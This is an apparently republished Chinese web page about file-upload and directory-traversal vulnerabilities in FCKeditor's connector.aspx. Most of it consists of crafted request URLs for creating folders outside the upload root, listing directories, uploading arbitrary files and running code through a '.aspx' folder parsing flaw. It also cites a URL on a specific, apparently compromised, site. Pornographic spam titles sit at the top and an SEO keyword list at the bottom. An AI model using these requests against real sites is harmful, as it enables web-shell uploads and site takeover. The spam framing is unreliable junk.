国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > 綜合 > 正文

網頁編輯器FCKeditor 新聞組件的一些程序漏洞

2024-07-21 02:53:29
字體:
來源:轉載
供稿:網友
很多網站可能都在用FCK的新聞編輯組件,使用FCK的時候一定要注意版本是否安全,以下是FCK中的文件上傳漏洞:(主要是:connector.aspx文件的漏洞)
 
1 CurrentFolder 參數,可以在網站中不同目錄新建文件夾,參數使用 ../../來篡改參數,進入不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp 


2 CurrentFolder 參數,根據返回的XML信息可以查看網站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到沒有權限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F 

3 上傳文件時,通過修改CurrentFolder參數,可以將文件上傳到不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

4 同時修改Type 和CurrentFolder 參數,可以上傳任意類型文件到網站任意目錄,基本上網站就完蛋了。 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp 



5 通過創建文件夾的功能,創建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執行。

注:相關教程知識閱讀請移步到編輯器頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 中超| 大邑县| 雅安市| 大足县| 宁南县| 凌云县| 淳化县| 怀化市| 蓬莱市| 岑巩县| 扎赉特旗| 柳林县| 北宁市| 海原县| 新竹市| 吉木萨尔县| 年辖:市辖区| 大冶市| 桓台县| 喀喇沁旗| 平山县| 广水市| 呼伦贝尔市| 奎屯市| 临澧县| 龙川县| 鹤庆县| 二手房| 宁夏| 安乡县| 漯河市| 申扎县| 历史| 务川| 凤山县| 泰顺县| 尼木县| 本溪| 侯马市| 景东| 孙吴县|